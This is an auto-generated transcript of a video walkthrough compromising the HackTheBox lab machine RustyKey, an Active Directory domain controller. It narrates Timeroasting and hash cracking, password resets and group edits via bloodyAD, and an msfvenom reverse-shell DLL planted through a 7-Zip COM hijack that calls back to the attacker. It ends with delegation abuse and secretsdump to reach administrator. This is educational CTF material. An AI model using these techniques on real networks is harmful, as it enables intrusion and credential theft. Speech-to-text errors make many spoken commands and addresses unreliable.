HackTheBox - RustyKey
Key Takeaways
The video demonstrates a cybersecurity attack on a HackTheBox machine called RustyKey, utilizing various tools and techniques such as nmap, Blood Hound, and Kerberos authentication to gain access to the system and escalate privileges. The attack involves exploiting vulnerabilities in Active Directory, using tools like Sharp Hound and Rust Hound, and leveraging techniques like COM hijacking and resource-based constrained delegation.
Full Transcript
What's going on YouTube? This is IPS doing Rusty Key from Hack the Box, which I find to be a very well put together Windows machine that has a nice balance between Active Directory and general Windows exploitation. We start off with a set of credentials, which in reality we don't need because the first step is a time roasting attack, which doesn't require authentication to steal computer account hashes. However, without that previous access, it would be a complete guessing game to do the time roast attack. Once we get access to the computer account, we discover a path that lets us take over user accounts through adding ourel to a group and changing the password. But there's a few tricks. Firstly, NLM authentication is disabled, so we have to use Cobros. And secondly, the users in the protected objects group, which blocks a lot of our tools from working. Thankfully, we have the right to remove users from this group, which allows us to continue onto the box, which we find a PDF that indicates we have to perform a com hijack on sevenzip. However, the user that has access to the register key is denied remote login rights. So, after doing the same takeover we did previously, we use a tool like run as CS to switch to this user. After the com hijack, we gain access to an account that can perform resourcebased constraint delegation to get root. There's a lot of cool things, so let's just jump in. As always, we're going to start off with the end map. So, - sc for default scripts, sv enumerate versions, vv for doubleost. This gives us things like the ttl oa output all formats in the end map directory and call it rusty key. And then the IP address of 10101.75. This can take some time to run, so I've already ran it. Looking at the results, we have quite a few ports open. Looks like 11 uh because we have 989 there. And the first thing I see is DNS on port 53. The banner says simple DNS plus. And this is the default banner of Active Directory. So I always scroll down and confirm. Yes, AD is installed. And it's giving us the domain name right here. So let's go ahead and copy this and then do sudo vty host. We're going to add this to our host file. So um 1010175 rusty key.htb. And now there's something that um is somewhat unique here. I'm used to seeing a lot more information. Um, normally LDAP has like an SSL certificate, especially if like active directory certificate services installed and then you'd see like rusty key dash um maybe like ltd-ca or something as the certificate authority. We're not seeing that here. Uh, let's see. I can actually be a little bit of spoilers, but let's just go back to an old box. Let's say certificate and then we can do end mapap uh certificate map. And we see this information, right? We have a bunch of SSL. We can get the host name from it. So, there's a lot of information here when certificate services is installed. We're not getting that on this box. So, most likely AD is just a vanilla install and not much customization has happened. Um, let's see what other ports we have. Kerros, that's not surprising. Um, 445, this is going to be SMB, LDAP, and that's about it. Uh looking at the scripts, we can see there is an 8h hour clock skew. So um if we want to do any curros related things, we have to make sure we set our time correctly on this box. This is a assumed breach box. So we will start out with a set of credentials. But before we get to this, let us just quickly um run a net exec. And I'm going to get the host name of this box because I always like adding that into my host file. So, I'm going to do a NXE SMB 1010 1175. And this should be able to give us the um host name, which is just DC. So, let's go ahead and add this to our host file. So, we can do DC.rusty key.htb. And then, um I guess let's generate a kb fe uh a kerros file. This is something you should always do on active directory machines because it helps your Linux machine talk to it if you ever want to do tickets, right? So, I'm going to do dash generate kobb5 file. I want to say I'll call it rusty key.karb. And let's see. I just want to look at this real quick because I did specify the IP address here. I know in old versions of net exec you have to use the host name because it would just put the IP address in this kb 5 file. But it looks like it's correctly pulling everything right. I see admin server as the DC and that's what I want to see. So, let's do a um pseudo cp rusty key to etsy uh kob5.com. And let's see what else do we want to do here. Um we can probably start off with testing our credentials. So, I'm going to go back to my nxc command and then we can do a -ash u. Um looks like I already overwrote. Oh, nope. There we go. There it is. And we can do ap. And I'm going to put the password in quotes because we have some special characters there. So, this is just going to tell me if um our credentials are correct. Uh we get status not supported. So, I'm guessing NLM uh is disabled, but we can just add a - k. And this is going to do a kerros authentication. And hopefully this works. Uh we get a clock skew error. So, let's do pseudo ntp date um 10 10 1175. This is going to sync our time to the box. If you do this and your time goes immediately back, you're probably having time sync enabled in your VM. So go into Virtual Box or VMware and disable um time sync there because the OpenVM tools is just overriding what you're trying to do. Uh but now let's go ahead and run this again. Third time is the charm. Hopefully we get authenticated here. And yes, there we go. So we have authentication. We could try some things like um d-shares to see if there's open file shares on this box, but in reality, the thing I normally do is just run rustound from here. So, I'm just going to do rustound. Uh let's go up here. I want to say we want to do dash d rusty key.htb-r parker-p. And this may be all we need to do. I'm blanking on all the flags, but I want to say this is good. Yes, it is. We are connecting and we're getting a bunch of data. Awesome. So, I'm going to go ahead and start up Blood Hound. I have it saved in um opt blood hound server docker compose up-d. We do our ls. We have the JSON files. So, we should be able to go to localhost 8088 and probably like 15 seconds and then get access to blood hound. Um, uh-oh. My box has completely froze. Uh, I'm not sure what to do here. Oh, there we go. It's coming back. It's still waiting for the graph DB to start. Um, I'm probably going to pause the video and we'll come back when it comes. Nope. There we go. Awesome. So, we can just do admin and then please subscribe. Uh, I think one exclamation point is my password. Maybe exclamation point one. There we go. We get logged in and we want to upload the JSON files. So, let's go to HTB. Where is Rusty Key? There it is. Copy all these JSON. Upload and administration. It is ingesting. And this is going to take a minute or two to um ingest. So, I'm just going to pause the video and we'll come back when this is all done. Okay, we have all the data ingested. So, let's go over to explore. And if we ran a bunch of these pre-built cipher queries, we really don't see that much. Looking at domain admins, uh, we only see one. That's a bit odd. I expected to see like two because there's two domain admins here. Uh, let's see. Is there a shortest path to domain admins? Shorest path trusted. There we go. Shorest path to domain admins. Let's look at this. And what do we see? Um, there we go. Uh, we have backup admin that is a member of enterprise admin that has generic right to domain admins. So maybe because enterprise admin isn't a member of domain admins, that's why it's not showing up. Yeah. Um, I'm guessing that's why. I wonder if that query should end in No, we have owner SID 512. I'm confused real quick. Um, if we go back to this one cipher query, where is it? All domain admins we see anti object ID ends in 512 and we're a member of administrators and this ended in 512 right oh this ends in 544 um let's see what if I edited this Maybe this is the better way to show domain admins. I don't know. Um, but here we can see now uh domain admins and enterprise admin. Um, I'm not sure if that's correct, but hopefully start like playing around with Blood Hound and understanding these things because it's a really powerful tool. A lot of the default things that just don't really get you anywhere, right? Um, let's go over to the search. We had what user do we own? Um because this is the assumed breach box. Um what user do we run this with? R Parker. So this is also normally where I start. I go to my user. We look at them and let's see we go outbound control. We have nothing there. Uh we can add to owned. Oh yeah, add to owned. And then we can do shortest path. And then what is it? Um, I'm trying to search for shortest from or shortest paths from owned. There we go. Run this. And all this shows is we're member of domain users that has users. So, we really don't have any information on Blood Hound. Now, one thing you can do that's really handy, especially in CTS where the active directory environment is small, is just look for all edges that have um unique things set about them, right? So if I do a match and we change this to um the source grab the relation to a target and then we want to show um sources that are computers or um sources that are user. If we did group it will get very very messy. Um it's even going to get messy here. If I just do return P, we're going to see a lot of data here. And that's because every user and every computer object has this member of property, right? So what I'm do is filter this out. So we're going to say and type relation is not member of. And I think I have to do that. And now we have something very simple. We have it computer 3 is a member of help desk. Um if we look at what help desk can do uh if we go to outbound object control um help desk has force password change over e read we have generic write force password change over dd ali and we have some more force password changes over users um if we look at one of these users let's go with gg Anderson we can go to member of uh we see protected users so we can't do some authentication mechanisms but they're also remote management user, right? If we look at this group to see who's a member of it um click on this members of this. So all these users can probably win RM into the system. So these are the users we want to get to and the IT computer 3 object actually had a path, right? The IT computer 3 had add self over to the help desk. Now the question is how can we compromise this, right? Um, with computer objects, there's really, uh, two ways that you can easily compromise them. The first is if they have that, um, legacy, if they're really old or in member of like Win 2K pre-authentication, it's possible their computer name is going to be also the password. Um, I forget exactly what box we use that on. I want to say it's vintage, but you go if you go to IPSC.rocks, um, that will show it. So, but if we look at member of, it's only domain computers. So that's probably not going to be the case. Now there is one other thing that is very interesting about this box. Um if we look at password last set we see it is December 27th 540. Now if we look at when this was created that's where is the creation? Um that's password last set it's created December 26. So this is one day difference right? Um, computers in active directory should change their password automatically every 30 days. This is only changed one day later. So, this is probably going to be a user set password, which means it is weak. If we look at any other computer object, I'm going to go let's say um it computer 3. Oh, we that's the one that this is. Let's do it computer 2. We can see it is created December 26 and the password last set is December 26. So this probably has the autogenerated password, but it computer 3 doesn't. And what makes this interesting is there is a time roast attack you can do against computers which will let us get the um password hash essentially of it. And net exec has something for us that we can use. So I'm just going to do net exec. Let's go back to nxc. And we're just going to do the module time roast. I think that's all we need to specify. And there we go. It's going to start time roasting and it's going to just brute force everything with an RI brute. And then we get potential hashes here. So what's happening is we're sending some weird NTP thing to a computer object and it's responding back with a um I think a pre-authentication ticket or something like that that then is um hashed with the NLM of the computer account. And since it's hashed with that, we can potentially try to crack it. Um, or maybe the time is encrypted with the hash. I forget exactly how it exactly works. I'm sure if you Google like time roast to active directory, you can get some information about it, but typically a lot of kerros tickets, I want to say it is the current time that is hashed with the NLM hash of the account. And that's generally why you can crack Kerros tickets, right? So, I'm going to copy all of these hashes. And then we're going to go over to the Kraken. This is just where I have hashcat. And if you don't automatically um crack this, make sure you update hashcat because this is a relatively new technique. I want to say within the last year. Um so undo the hashes rusty-time. And I'm going to paste all of this. And then we also I just realized have to filter this out. Um if I do a let's see if we had it we want one two three four five. So I'm going to say a print five. I'm just going to copy that to t and we can move t over top of our thing. And now we just have a hash file of everything. And then this number here, this is going to be the RI ID of the computer account, which is a username essentially. So when I try to crack this, I'm going to give it the username flag. So when it cracks something, um, I can go back and see which hash that correlated to. So let's go dot slash hashcat. Um, paste in the hashes, then opt word listu.ext, text and it should automatically detect this. So, let's see. Um, I said we had to and I didn't. Um, specify the d- user so hashcat knows we added the username. And there we go. One has cracked really quickly. So, I'm just going to do the d-show now. Uh, and we see 1125 is rusty 88 bang. So, if I go back over to Blood Hound and I search for 1125, IT Computer 3 comes back and that is because it has that um SID, right? We can see that here. So, IT computer 3 has now been owned. We have the password. I'm going to go and add this in creds.ext. So, we can say creds.ext it computer 3 um what was it? It was Rusty 88 Bang. I want to say uh Rusty 88 Bang. I hope that's right. Uh CAD it. Let's do NXC SMB 101175 it computer 3 Rusty 88. Bang. Is that going to crack? Uh status not supported. Keraros because NTLM is disabled. Please authenticate. Yes, it does. Awesome. If we had an invalid password, it's going to say um not valid, right? Yes. So, we have successfully cracked that IT computer account. So, this had add self over to the help desk. And then help desk had a lot of edges. And I do want to call something out here. Um, if you ran Rust Hound pretty much just before today or yesterday, um, it would not find these edges. There was actually a bug in Rusttown that me and OXDF had fixed. Um, so if we went to Google, let's go GitHub Rust Hound. Uh, go here, go to the issues, let's go and also look at closed issues. We can you can look at everything here of what went on, but a lot of changes went into Rusttown very recently to add this. Um, if you were just solving the box and ran into a wall, um, I would recommend running another tool. Um, in this case, you'd have to run like the Blood Hound Community Edition and that would also um, get this flag. So, if you ran both Rust Hound and the Blood Hound Community, then you'd see this edge. If you just ran Rust Hound, it wouldn't work. Um, Sharp Hound is by far the most accurate collector. However, it has to be ran from Windows. And at this point, we don't have a shell in the box, so it becomes a little bit of a pain to run uh Rust Hound. But again, um big thanks to OXDF. You can look at his um issue here, which he like use Claude in order to automatically fix this, which was pretty cool. Um but yeah, uh make sure you always keep your tools up to date. And that's another good thing about just solving boxes. Um, if you're looking to get a like um bigger name for yourself, you'll find a lot of bugs just in tools that then you can go back to the creator or try to fix them yourself and then uh make the open source ecosystem better. But I'm going to get off my soap box now and let's go back to looking at this path, right? Um, we said uh GG Anderson was a member of WinRM. Actually, I think all of these users may be. Um, if we looked at BB Morgan, one thing sticks out here. Uh, no. GG Anderson, I think one thing sticks out. That user, man, there we go. Uh, is disabled. We see enabled false. So, BB Morgan is enabled. Um, EE read, if we look at what they're a member of, they are a member of users. So, um, they're member of support as well. So we want to go either to the BB Morgan or EE read user. The other thing you could just do if we now go to it computer um actually we already marked them as owned. So I bet if we did shortest paths um from own principles it becomes a lot more interesting right um owned objects. Run it. Here we go. So we can see it computer member of help desk force password change. Um I'm surprised it doesn't have like Windows remoting and then win rm to the DC. Little bit surprising but not that I guess. Um let's see what else do I want to call out. I know there's one other thing that I just can't seem to remember. Um, oh, we have, let's see, if we go back to help desk help out object control, we do have generic write over DD alley, right? Um, so we can force password change and change um, principles or um, attributes in their active directory account. Now, this is mainly useful, I think, for like some ADCS attacks. I want to say it's 9 and 13 where you can change the UPN and that allows you to impersonate users. Um also in a recent insane box we modified the UPN created a ticket so the Linux box that authenticated with AD would trust the UPN and then um that allowed us to impersonate a user. I don't see Linux boxes and ADCS was not installed to my knowledge. So this generic right I don't really know what to do exactly with it but it's just something to keep in the back of your mind. If you want to know more about those attacks just go to IPSC.ros box, type um probably UPN and they'll bring up boxes related to that. But let's go ahead and do the attack to get into um BB Morgan. They're enabled. Yes. So, let's go uh pathf finding it computer BB Morgan and we can show this attack, right? So, they have add self force password change. Awesome. So, let's see this. I'm going to go and use bloody ad. So, we'll do um bloody ad- d rusty key.htb host DC rusty keyhtb. User is going to be it computer 3. And then the password is going to be rusty8 bang. And then we want to add the dash k for kerose. And I'm going to do add and then the help uh we want to do group member um and we want to add ourselves to the help desk. So help desk and then the principal is going to be it computer 3. So we're adding oursel into the help desk group. Let's see. There we go. We have been added and now we want to change the password to a user. Uh I want to say that is going to be set. And we can just do password. Uh the target is going to be BB Morgan. And I'm going to set BB Morgan to please subscribe exclamation point. Password has been changed. So let's do a get tgt to get a kerros ticket for this user. So we can do get tggt. Um what is it? Rusty key.htborgan. htb Morgan and then the password please subscribe. Bang. And we get this KDC error type. KDC has no support for the encryption type. And if we look at BB Morgan, uh they are a member of the protected users and protected objects. Now, protected um objects will prevent a lot of just basic attacks. Um maybe it's a protected users. Let's see. Protected objects active directory. I'm going to go to Google because I like their search results better. Um what does it do? And he I'm going to add some keywords. It protects against a lot of like credential theft. It prevents you from having um very long TGTs. So we can't get TGTs longer than 4 hours. Uh prevents a lot of delegation. We can't use um DEZ or RC4 encryption types in Kerros pre-authentication. And we can't use NLM authentication. So those are the main things it does. And in packets get TGT if you specify the password um it's going to use RC4. So um that is why we can't do this. Now one thing I would generally do is I would switch and use AES authentication and you can um generate the AES keys um if you know the password. So let's see as key generation Python GitHub. Can I find this real quick? Yes, this is um this is another thing that would be great if it just got imported into um impact because if we look at the get tgt options, there is no way to use AES key if you um just specify the password. So we have to generate this AES key manually. So go here. Let's do Python 3 VM.VM. And again, this is not going to work because I don't think AES is configured on the box, but I do want to show this type of stuff because these are the paths like I would gently go down, right? So, we can do source um to activate it. Let's do pip 3 install requirements and then we do python 3 as kb keygen. Uh we need to specify the domain which is rusty.htb HTTP the user um this is BB Morgan and then the password is please subscribe. Bang. Right. And there you go. It gives us the salt and then we get an AES key. So if we try this um where was my get TGT? Uh let's get rid of the password. I think it's dash A. Yes, but let's do a dash help as key. We still get um no support, right? So, as did not work here. Uh we don't know exactly if it didn't work or we did something wrong. We can kind of confirm we did something wrong by doing a user that um we have. And if you use the um user you start out with because it's assumed breach, it's still not going to work. I want to say it needs like pre-authentication. So I'm going to use the computer object and we can get something different. Um, so let's do dash user it computer 3 and the password was rusty 88bang. And then there's also a flag if you're doing it with a computer object, the dash host, because AES keys for computer objects are salted slightly differently, right? um we want uh to add host IT computer 3 and then the fully qualified name. So the sort is done a little bit differently. I'm going to copy this. And now let's go um back to get TGT. Going to give it this AES key. And the host is going to be IT computer 3 and no support for this encryption type. If I change a single thing, so I change that B to a C, uh, pre-authentication failure. So we know that it's passing pre-authentication with this AES key. So we generate it correctly and then the error is coming, right? Um, if you don't have pre-authentication enabled, so this can be any like non-curb roastable user, uh, you'll never get this message and you'll always just see this error message. So, you can't confirm you generated the AS key correctly. Uh, but with computer objects, we're able to, uh, do this. So, let's see. Um, this was a big dead end, but we do have the ability, uh, to remove the, um, bit. So, if I do bloody ad um let's see dash d rusty key.hdb HDB uh let's just do d-h har like this and instead of set password what we're going to do is remove group member protected objects it uh insufficient access um I bet this is because it removed us from the group run this again add it to the help desk group. Run it. And there we go. We have um removed that. Let's see. Let's set the password again. Okay. And then I'm going to now do a get tgt. And we save the ticket. Right. So because we removed the protected objects from the user now we can do RC4 authentication and get the TGT. Um we could also validate this by doing a describe ticket BB Morgan.cc cache. And we can see uh where is encryption type? There we go. Encryption type is RC4MAC E type23. So again, because it was in the protected user, it was refusing to give us this um ticket. But because we removed the protected user, that's why I could get this ticket. Now, the one question you should be asking is how I knew I could just um remove users from that protected objects group. And honestly, I don't see it in Blood Hound. I'm pretty sure when I was solving this box, I did see it. And that may be because I ran multiple um blood hounds. So I want to say the help desk did have a permission that I'm not seeing. Uh let's see Sam account outbound. We only have all these force password changes. Um if I go to protected objects, let's go to inbound control. Let's see. I don't see much. Um, we could go back to bloody ad. I'm going to make sure I'm in the group and then I'm going to do a get-h. Let's see. We want to do get writable. This is always good to run when you start getting into dead ends. And we can see we have write access to protected um objects. So why did not blood hound not show this? Um, I'm actually going to run the Python inester. So, let's do nxe ldap dc rusty key.htb user r parker uh password. Let's go ahead and grab this. Paste that. Uh we can give it the blood hound flag kros collection all DNS server is 10 10 1175. This should now um write everything we want. It's going to take a little bit to run, but this will get us a zip file. We'll upload to Blood Hound and then look at our permissions again. Um, so I'm debating if I want to just pause the video right now because it's looking like it's taking a little bit of time to do this. So yeah, I'm going to pause the video and I'll resume when this is done. Oh, as I was about to go um, pause it. It finished. So no need to edit there. Let's go ahead and move this object into a directory. Go back to Blood Hound administration. Upload files. And I wonder if that's going to be one of the files that failed to ingest. That could also be the case. I know there's a bug with that. Older versions of Blood Hound um process it, but the newer versions don't. I want to say some like um value is blank, which is causing a validator to fail. Um it's something silly. So we have this upload is done. It is ingesting. Uh let's see that would probably be we'll see what edge it is. Um it is complete. So I can go to explore. Let's now go back to the help desk. What outbound permissions do you have? Are you going to magically show up? I see five now. Uh there we go. Uh oddly it's just showing add member. Um there are other edges to this. So let's go inbound control. Do we see this um help desk? So it's not showing we have right. It's just showing add member which is equally as interesting. Um, but this is indication that something can happen there, right? Uh, make sure the computer's not there. Yeah. So, um, always helps to run multiple blood hounds, I guess. Uh, let's go ahead and, um, progress, right? So, where was I? We ran blood hound. We got a TGT. Um, we're the user, right? So I'm going to do uh Kobe 5 CC name is equal to or TGT that we have got. Then we can say evil winrm- dc rusty key.htb the realm is rusty key.htb and if we just look at the files here we don't have much um I want to say is it treef I'm used to running. Yeah, we have a internal PDF in desktop. So, let's go to desktop and then I'm going to download internal.pdf and we'll see what this file is. So, I'm going to open internal PDF and we get a memo. So, as part of a support utilities rollout, extended permissions access has been temporarily granted to allow testing and troubleshooting. This has mainly helped to streamline ticket resolution. um related to extraction compression. So probably some type of zipping um by the finance and IT teams. Some registry level adjustments are expected during this phase. Let's see what else we have. Unrelated. Uh the permission change is logged and will be rolled back once the archiving utility is confirmed stable. Uh let DevOps know if you encounter anything. Um did I miss any keywords? Oh, there we go. Some newer systems handle context menu actions differently. So, this is going to be related to like com objects and CLS ID. Uh, you want to do googling around this to understand exactly what's going on. Um, I'll explain it once we get a little bit further, but uh the thing we have to do is switch over to um I think I don't think we actually have to yet. Um, I was gonna say we have to switch over to the support user, but I don't see anything in here that's telling me support has a unique permission. So, I'm gonna keep going um full steam ahead as this user and then switch over to support when um something tells me to. So, let's see. We're BB Morgan. They were talking a lot about um archiving utilities, right? So, I'm going to go cd program one because I hate typing like program files and program files x86 and oh man that crashed. Um, program one. There we go. I go in program files and we see sevenzip is installed. So, that's probably the archiving utility they're talking about. We do a diir. I don't see anything. So, I was looking for like when roar and things like that, but I just see sevenzip. Um the other thing it's talking about is um the context menu thing and that relates a lot to like com which is a component object model and essentially that enables Windows programs to share functionality right so for example like sevenzip it's likely that we want explorer or file browser to be able to go into sevenzip files and it treats them like virtual folders right you've double clicked a zip in windows and it's just went into that how that works is there's a com object that um points to like this type of file uses this DLL. So when Explorer clicks it or another program tries to open it, it's going to use um that DLL in order to process it, right? So that's the whole uh purpose I think around COM objects and things like that. And that all works under like CLS ids. I forget exactly what that stands for, but let's go ahead and query the registry for CLS IDs that have zip in them. So I'm going to do reggg query and then h keycr. This is um h key classes root I believe. And then cls ID. And we're going to search for zip. And this should take probably um another 5 to 10 seconds to run. I didn't remember this taking a while. Uh, but looks like it may uh because I typed it. It's regge query, not wreck. So, let's just copy and paste this. There we go. And whoops. These are all the CLS IDs that have um zip, right? And here is seven zips. One right here. So, we can see this CLS ID um is going to use sevenzip.dll. And if I wanted to, we could look at the permissions of this. So, I'm going to copy this. And then we can use PowerShell's what? Um get ACL command. And then in most registries, you can just do like cd um let's do current user for example. Uh and this is going to do a like weird virtual drive. And now we're in the HQ current user thing. There is no one for um HKCR. You can do a new PS drive and create one or you can just reference it a slightly different way. Um I'm going to do it the slightly different way. Uh my hands are off the wrong thing. So we'll do get ACL and then what is it? Um it's going to be registry double hkr. And let's see, we don't need HQ classes root like that. I think this is it. So if we do this get ACL um let's do a format list. There we go. This is seven zips um CLS ID and we see the support has full control. So in order to modify this registry, we want to become the support user. Um, and going back to Blood Hound, let's look at support. Look here. Uh, let's see. Members Ee Reed is a member of support. So, we want to do the same exact attack except, um, now we want to, um, take over EE read. Let's see. Was I do I have bloody AD commands here? Uh, yep, I do. Uh, so let's do the add command again to make sure we're in it computer 3. Uh, we already are. That's good. Um, so now we should be able to set the password to e read. And then we also want to remove protected objects. And e read is in support, not in um it. So, we're going to remove it from support. And now we should be able to use the get tgt command again, right? Um, so let's do e read and we have the ticket. So, let's do now a um kb 5cc name e read and log in. We get some weird error. Um, invalid token was supplied. Try it again and we keep getting it. And I even tried like um switching over to devious winrm. Uh let's see. We can do dash k username e read password please subscribe. Uh let's do I did keraros. Need a realm right? Yeah. DC uh rusty key.htb HTB and then we'll give it the target. I think this is all we need. And even this fails, right? Maybe it's um not fully qualified. Nope, it is. So the next thing I tried was like let's try net exec. So we can do net exec SMB uh 10 10 1175 E read password please subscribe. Kros and status login type not granted. So e read is definitely a member of um remote management users but there's some permission that is blocking um remote access to e read. So they can only do local login which sucks for us because that's what's preventing us from doing winrm. However, since we have a shell as BB Morgan, we can upload run as CS and then switch over to this user with a local user context. So, that's what we're going to do. Um, if I remember, I'll show um looking at secededit to look at this SE deny remote access, right? um for the specific user. But let's go ahead and go back to um BB Morgan and then I'm going to go into program data because this is where I like just writing files to on Windows. Um let's copy opt collection. Uh what is the next folder? Net framework for let's do 5 penny and then run as CS. Do run as cs.exe. exe. And now we can um actually let's put it in dubdubdub so we can easily copy it. And then we can do a wget http 101048 8000 run as cs.exe run as cs.exe. Start a web server. And I know you can also use the upload command in EVO winrm, but I just find it works better with wgate because I think what's going on under the hood there, it converts the file to B 64 in chunks and then like um on B 64s it on the console writing to a file. It it it's messy. Um I find this to be much more reliable with um just doing it over web. Let's make sure we copied it. We did. Awesome. So let's say e e read password was please subscribe. We'll put these in quotes. Let's do powershell r1010148 90001 rl nc lvnp 90001. Does this load? There we go. Awesome. So now if I do who am I? I am the EE read user, which means I'm going to be able to um modify that registry now. Uh let's see, where was it? Want to get my ACL command so we can put this on a clipboard because we're definitely going to need it. Um but first, we need to get us a DLL that will send us a reverse shell. So, I'm going to use MSF Venom for that. So you do MSF Venom payload is Windows x64 shell reverse dcp format is DLL um let's call it rev.dll DLL not Dell um LHOST is equal to 101048 L port is equal to 90001 that should do it. Um as a reminder if you did like shell/reverse TCP that's going to be um a staged one. So it's going to reach back to you expecting more DLS to go ahead and inject. Um, this is the much better way to do it for hack the box machines because you don't have to run um like MSF handler to get the reverse shell. So there we go. We have the DLL. Uh, let's copy it to dubdubdub. Let's go into cd program data. Start a web server back up. wget http 10 10148 8000 rev dll um we'll call it rev dlll there we go we have downloaded it so now what we want to do is um a set item property to write that registry key and that's the key we're going to write because that's what was um pointed to sevenzip I bet if I do um was it say get item we can see and proc serve the property default it's pointed there right so we want to do a set item and then we want to change the name default to the value C colon program data rev.dll DLL um what set item couldn't find name is that case sensitive let's do capital V am I specifying something wrong. The set item property. There we go. Um, not set item. Set item property. I thought it would like um truncate the name, but I guess it didn't. Uh, that's not dying. Let's kill that pain. NC LVMP 90001 RL rat. Let's do that get item again to make sure it is set. So what we're doing now is waiting for a user on this system to open up a sevenzip file. And if we did everything correctly when they try to open up sevenzip or open up the archive, it's now going to access RDLL which is going to send us a shell. And hopefully I did the MSF Venom command correctly. Um maybe we should have tested that before doing this. Um, but I'm just gonna give it, let's say, two minutes. Oh, as I was talking, we got a shell. Awesome. So, let's do who am Iall and let's see. Let's just do who am I. So, we are mm Turner. So, let's go here and look at MM Turner and let's see a member of we are a delegation manager and I should have just looked at um outbound control. We can see mm Turner is a member of delegation manager that is allowed to act on um the DC. So this is essentially going to allow us to set up um RBCD um resourcebased constraint delegation. And I'm pretty sure we also have um talks about this. So I definitely recommend watching one of these videos. Maybe vintage is a good video because that one we um what is it? we you abuse the like pre2k authentication to login as a machine account with the host name and then we do resourcebased constraint delegation at the end. So, um, that's another good one to watch. But we're going to, uh, perform this attack. And the easiest way to do it is, let's see, we have to find a user we want to delegate, right? And if we look at administrator, I don't think we can use administrator. Let's see. Um, I think it's because it's marked sensitive. Do we have a delegate flag? um trusted for constrained delegation false. Uh the other user we saw was backup admin, right? If we look at backup admin, let's see, are they marked as sensitive? False. Trusted, false. There's something set about the administrator that um blocks it from doing it. Um, let's do get 80 user administrator properties star. Oh, I'm not in PowerShell. Get ad user administrator properties star. Do we have any delegated? Um, it's not trusted. account not delegated. There we go. So, that's what's going to prevent us. Um, I know Blood Hound shows it somewhere. Let's try backup admins. Uh, what was it? Backup admin. Yep. Account account not delegated is false. So that's what's going to enable us to do delegation here. Um and on previous boxes we did this from um impact. Uh we don't have our user's password. So it's going to be hard for us to use impact for this. However, we can just do everything from PowerShell, right? Uh all we have to do is set the AD computer um DC principles allowed to delegate to account it computer 3. And for this to work, um, we just need to know the computer password for this, right? Um, and a lot of the attacks, we're just using, um, our ability to create computers because when we create a computer, we can specify the password and then we can create service tickets manually. Um, we don't have to create a computer account in this case because we already know it computer 3's password. So we do this and now um if we do a get 80 computer DC I should have done this before um is it principles allowed to delegate to account I want to say let's see we can see it computer 3 is allowed to um delegate so this means it computer can now create Kerros tickets that the Rusty Key domain is going to trust. Um, so to wrap this all up, we can finally exit here. Let's do a get st for get service ticket and then rusty key.htb it computer 3. And that computer account's password is rusty8 bang. And then we're going to give it um the kerros flag. We also got to give uh service principle name. We'll do CIFS. That's going to enable us access to um SMB. So rusty key.htb and we're going to impersonate the backup admin because that was also um an administrator in this box. So now we have this ticket. So let's just do um a secret stump. Uh let's do KB5 CC name is equal to that secrets dump and then rusty key.htb. Is this all I need? Uh status not supported. Let's see. Do we still have it? We're still allowed. It's probably my secret stump command that is wrong. I thought it would pull a lot of information from the ticket or from the um yeah the ticket, but maybe it doesn't. Let's just specify the full thing. Rusty key to HTB backup admin at DC rusty key HTTP. Um let's specify no pass. There we go. This looks better. So now we're going to start um grabbing all the hashes for the accounts and we should be able to log in with the administrator account. Um there we go. We have the local SAM for administrator. We're just going to copy this and see if we can log in. Maybe administrator is a protected account and we can't just use this NLM willy-nilly, but I'm not positive about that. So let's do NXC SMB 10 10 1175 user administrator administrator I think H for hash is that right um status not supported keraros um KDC principle unknown so I don't think we can that's also the local administrator. I'm not sure if that um includes the domain account. So maybe we'll get a different hash for this administrator or we'll just have to um remove administrator from protected object and then we can log in as them. Um we'll figure out in a second. Is that the password? Did we just get the password this way? Um, rusty RC4. Where did default password come from? I have no idea where this came from. Uh, or how they get set it. Let's see. Uh, definitely need dash K. KDC principal unknown. Looks like impact crashed on me, but I think we get to the administrator hash. And this definitely does look slightly different, right? So we have it began with F um 7A and up here this began with E3. So the difference is this is the local database. when you make a um domain controller member of the domain then it avoids using the SAM for local login and then switches over to um NTDS.get. So let's now try net exec again. We'll specify this hash and does it let us in um principal unknown administrator. That is correct. Actually it was not correct. Um, administrator. Let's do this hash. And come on, say poned. There we go. So, yeah, it helps if I type the name correctly, right? Um, I should have known from the error message we were getting like the unknown principal, right? Um, KC principal unknown. That's telling us like it doesn't know administrator. If we gave it a invalid password, this is going to give us something different, right? um pretty all failed. So it helps to be able to read error messages, right? Because that was telling me right now I made a typo in the username and these are the things that you just get from experience like um making typos in username is something that happens all the time to almost any red teamer and pen tester, right? Um being able to recognize the error that's telling you you did that, that is something that just comes from experience. So um let's see now we should be able to just get a shell. Uh I'm going to use ps exec. So, we'll do administrator. Um, I bet that rusty key password worked. This one. So, nxe admin straight. We could have done ps with the ntlm hash, but let's just see if the admin password works as well. It does. Awesome. So, let's do uh let's see psexc.py-k pi dash k rusty key.htb administrator like that and then at dc rusty key.htb HTTP requesting shares uploading and come on. There we go. So we can do users administrator desktop type root.ext and there we go. Um we get that um hash. That definitely did not clear the screen. But uh the last thing I wanted to show is just um doing a um secededit to export um a lot of local policies and then showing the deny lo on write to e read. So let's do a sec edit export and we're going to write it to C colon program data sec policy config. And this is something I just asked AI to do. So it's not something I have memorized. Um I was just asking like how do I look for the um deny log on write privilege I think is what I asked and this is what it told me. So we can type this file and then do a find string on e read I think. Um, oh, we're in um I thought that was it in command prompt. Let's just switch over to PowerShell. Is my shell wonky? Hopefully, this still works. um cat sackp cfg and we can select string e read doesn't look like we got anything there. Um we can try looking at the group the user's in. So let's paste this and then type um support. I wonder if select string is case sensitive. Uh, looks like we're getting some things. So, let's see. Here we go. SE interactive login, right? Oh, there we go. Um, SE deny network login right to the host support and delegation manager. So, this is why um e read could not um win or m to the box because it has the se deny network log on. Right. So, hopefully um you enjoyed this. So, take care and I'll see you all. Apologies for the sloppy cut, but the video is not over. After I recorded the video, I was playing more with this box, trying to figure out why Rusttown missed one of the properties and exactly what the property meant. And in specific, I'm talking about how we knew um we had access to this protected object, right? Because if I click on here and go into inbound um rustound had missed the help desk having add member on this um object. And this add member is kind of I think confusing because this is actually like um write property member I believe. So if we have this add member we can also remove it. So the blood hound Python code is not wrong. It's just I think the edge is kind of misreading in the name because normally you see like write property and then something else but this is just called ad member. If you can add you can probably remove. I guess I think that's what's going on right. Um, and if we look at the actual data from Blood Hound, uh, from Rust Hound, it would be in groups. So, I'm going to cat this file. We can do jq dot. Uh, let's go over to less. And then I'm going to look at protected objects. And if we look at all the aces, uh, 512, I think this is administrator, administrator, probably domain. uh 519. All these 500s are going to be um like standard default active directory groups, right? So, I'm gonna go and look at the Python data. And that was this one right here. 